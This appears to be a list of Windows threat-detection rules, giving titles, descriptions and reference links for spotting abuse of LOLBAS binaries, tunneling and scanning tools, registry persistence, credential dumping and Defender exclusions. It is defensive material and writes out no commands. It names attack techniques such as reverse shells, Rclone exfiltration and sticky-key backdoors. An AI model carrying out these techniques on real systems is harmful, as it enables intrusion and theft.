Arbitrary File Download Via PresentationHost.EXE |
Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/239/files |
XBAP Execution From Uncommon Locations Via PresentationHost.EXE |
Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
|
https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ |
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution |
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary |
https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 |
Abusing Print Executable |
Attackers can use print.exe for remote file copy |
https://lolbas-project.github.io/lolbas/Binaries/Print/, https://twitter.com/Oddvarmoe/status/985518877076541440 |
File Download Using ProtocolHandler.exe |
Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ |
Suspicious Provlaunch.EXE Child Process |
Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Potential Provlaunch.EXE Binary Proxy Execution Abuse |
Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Screen Capture Activity Via Psr.EXE |
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. |
https://lolbas-project.github.io/lolbas/Binaries/Psr/, https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
PUA - 3Proxy Execution |
Detects the use of 3proxy, a tiny free proxy server |
https://github.com/3proxy/3proxy, https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
PUA - AdFind Suspicious Execution |
Detects AdFind execution with common flags seen used during attacks |
https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects |
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE |
Detects active directory enumeration activity using known AdFind CLI flags |
https://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md |
PUA - AdvancedRun Execution |
Detects the execution of AdvancedRun utility |
https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - AdvancedRun Suspicious Execution |
Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts |
https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - Advanced IP Scanner Execution |
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner |
PUA - Advanced Port Scanner Execution |
Detects the use of Advanced Port Scanner. |
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner |
PUA - Chisel Tunneling Tool Execution |
Detects usage of the Chisel tunneling tool via the commandline arguments |
https://github.com/jpillora/chisel/, https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/, https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/ |
PUA - CleanWipe Execution |
Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. |
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe |
PUA - Crassus Execution |
Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. |
https://github.com/vu-ls/Crassus |
PUA - CsExec Execution |
Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative |
https://github.com/malcomvetter/CSExec, https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ |
PUA - DIT Snapshot Viewer |
Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. |
https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap |
PUA - DefenderCheck Execution |
Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. |
https://github.com/matterpreter/DefenderCheck |
PUA - Fast Reverse Proxy (FRP) Execution |
Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. |
https://asec.ahnlab.com/en/38156/, https://github.com/fatedier/frp |
PUA- IOX Tunneling Tool Execution |
Detects the use of IOX - a tool for port forwarding and intranet proxy purposes |
https://github.com/EddieIvan01/iox |
PUA - Mouse Lock Execution |
In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. |
https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf, https://sourceforge.net/projects/mouselock/ |
PUA - Netcat Suspicious Execution |
Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md, https://www.revshells.com/ |
PUA - SoftPerfect Netscan Execution |
Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
|
https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/, https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf, https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue, https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/, https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/, https://www.softperfect.com/products/networkscanner/ |
PUA - Ngrok Execution |
Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
|
https://ngrok.com/docs, https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp, https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection, https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/, https://twitter.com/xorJosh/status/1598646907802451969, https://www.softwaretestinghelp.com/how-to-use-ngrok/ |
PUA - Nimgrab Execution |
Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. |
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
PUA - NirCmd Execution |
Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity |
https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using |
PUA - NirCmd Execution As LOCAL SYSTEM |
Detects the use of NirCmd tool for command execution as SYSTEM user |
https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using |
PUA - Nmap/Zenmap Execution |
Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation |
https://nmap.org/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows |
PUA - NPS Tunneling Tool Execution |
Detects the use of NPS, a port forwarding and intranet penetration proxy server |
https://github.com/ehang-io/nps |
PUA - NSudo Execution |
Detects the use of NSudo tool for command execution |
https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - PingCastle Execution |
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. |
https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 |
PUA - PingCastle Execution From Potentially Suspicious Parent |
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
|
https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 |
PUA - Process Hacker Execution |
Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
Threat actors abused older vulnerable versions to manipulate system processes.
|
https://processhacker.sourceforge.io/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ |
PUA - Radmin Viewer Utility Execution |
Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md, https://www.radmin.fr/ |
PUA - Potential PE Metadata Tamper Using Rcedit |
Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. |
https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe, https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915, https://github.com/electron/rcedit |
PUA - Rclone Execution |
Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
PUA - RunXCmd Execution |
Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts |
https://www.d7xtech.com/free-software/runx/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - Seatbelt Execution |
Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters |
https://github.com/GhostPack/Seatbelt, https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html |
PUA - System Informer Execution |
Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations |
https://github.com/winsiderss/systeminformer |
PUA - WebBrowserPassView Execution |
Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md |
PUA - Wsudo Suspicious Execution |
Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) |
https://github.com/M2Team/Privexec/ |
PUA - Adidnsdump Execution |
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump |
Python Inline Command Execution |
Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. |
https://docs.python.org/3/using/cmdline.html#cmdoption-c, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
Python Spawning Pretty TTY on Windows |
Detects python spawning a pretty tty |
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Potentially Suspicious Usage Of Qemu |
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
|
https://securelist.com/network-tunneling-with-qemu/111803/, https://www.qemu.org/docs/master/system/invocation.html#hxtool-5 |
Query Usage To Exfil Data |
Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use |
https://twitter.com/MichalKoczwara/status/1553634816016498688 |
QuickAssist Execution |
Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
|
https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist |
Rar Usage with Password and Compression Level |
Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. |
https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/, https://ss64.com/bash/rar.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Files Added To An Archive Using Rar.EXE |
Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md, https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html |
Suspicious Greedy Compression Using Rar.EXE |
Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes |
https://decoded.avast.io/martinchlumecky/png-steganography |
Suspicious RASdial Activity |
Detects suspicious process related to rasdial.exe |
https://twitter.com/subTee/status/891298217907830785 |
Process Memory Dump via RdrLeakDiag.EXE |
Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory |
https://www.pureid.io/dumping-abusing-windows-credentials-part-1/, https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/, https://twitter.com/0gtweet/status/1299071304805560321?s=21, https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive |
Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension |
Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. |
https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ |
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location |
Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location |
https://www.fortiguard.com/threat-signal-report/4718?s=09, https://lolbas-project.github.io/lolbas/Binaries/Regasm/, https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ |
Exports Critical Registry Keys To a File |
Detects the export of a crital Registry key to a file. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Exports Registry Key To a File |
Detects the export of the target Registry key to a file. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Imports Registry Key From a File |
Detects the import of the specified file to the registry with regedit.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Imports Registry Key From an ADS |
Detects the import of a alternate datastream to the registry with regedit.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Regedit as Trusted Installer |
Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe |
https://twitter.com/1kwpeter/status/1397816101455765504 |
Suspicious Registry Modification From ADS Via Regini.EXE |
Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. |
https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini |
Registry Modification Via Regini.EXE |
Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. |
https://lolbas-project.github.io/lolbas/Binaries/Regini/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regini |
DLL Execution Via Register-cimprovider.exe |
Detects using register-cimprovider.exe to execute arbitrary dll file. |
https://twitter.com/PhilipTsukerman/status/992021361106268161, https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/ |
Enumeration for 3rd Party Creds From CLI |
Detects processes that query known 3rd party registry keys that holds credentials via commandline |
https://isc.sans.edu/diary/More+Data+Exfiltration/25698, https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt, https://github.com/HyperSine/how-does-MobaXterm-encrypt-password, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry |
Suspicious Debugger Registration Cmdline |
Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). |
https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ |
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI |
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
|
https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content |
Potential Persistence Via Logon Scripts - CommandLine |
Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence |
https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html |
Potential Credential Dumping Attempt Using New NetworkProvider - CLI |
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it |
https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy |
Python Function Execution Security Warning Disabled In Excel |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
|
https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327 |
Potential Privilege Escalation via Service Permissions Weakness |
Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ |
Potential Provisioning Registry Key Abuse For Binary Proxy Execution |
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Potential PowerShell Execution Policy Tampering - ProcCreation |
Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine |
https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 |
Hiding User Account Via SpecialAccounts Registry Key - CommandLine |
Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
|
https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/, https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/, https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/, https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Persistence Via TypedPaths - CommandLine |
Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt |
https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html |
Potential Regsvr32 Commandline Flag Anomaly |
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. |
https://twitter.com/sbousseaden/status/1282441816986484737?s=12 |
Potentially Suspicious Regsvr32 HTTP IP Pattern |
Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. |
https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ |
Potentially Suspicious Regsvr32 HTTP/FTP Pattern |
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. |
https://twitter.com/mrd0x/status/1461041276514623491, https://twitter.com/tccontre18/status/1480950986650832903, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ |
Suspicious Regsvr32 Execution From Remote Share |
Detects REGSVR32.exe to execute DLL hosted on remote shares |
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/ |
Potentially Suspicious Child Process Of Regsvr32 |
Detects potentially suspicious child processes of "regsvr32.exe". |
https://redcanary.com/blog/intelligence-insights-april-2022/, https://www.echotrail.io/insights/search/regsvr32.exe, https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo |
Regsvr32 Execution From Potential Suspicious Location |
Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. |
https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Regsvr32 Execution From Highly Suspicious Location |
Detects execution of regsvr32 where the DLL is located in a highly suspicious locations |
Internal Research |
Regsvr32 DLL Execution With Suspicious File Extension |
Detects the execution of REGSVR32.exe with DLL files masquerading as other files |
https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/, https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://guides.lib.umich.edu/c.php?g=282942&p=1885348 |
Scripting/CommandLine Process Spawned Regsvr32 |
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. |
https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Regsvr32 DLL Execution With Uncommon Extension |
Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. |
https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Potential Persistence Attempt Via Run Keys Using Reg.EXE |
Detects suspicious command line reg.exe tool adding key to RUN key in Registry |
https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/, https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys |
Add SafeBoot Keys Via Reg Utility |
Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not |
https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ |
Suspicious Reg Add BitLocker |
Detects suspicious addition to BitLocker related registry keys via the reg.exe utility |
https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/ |
Dropping Of Password Filter DLL |
Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS |
https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/, https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter |
SafeBoot Registry Key Deleted Via Reg.EXE |
Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products |
https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html |
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE |
Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/, https://redcanary.com/threat-detection-report/threats/qbot/ |
Service Registry Key Deleted Via Reg.EXE |
Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services |
https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
Potentially Suspicious Desktop Background Change Using Reg.EXE |
Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
|
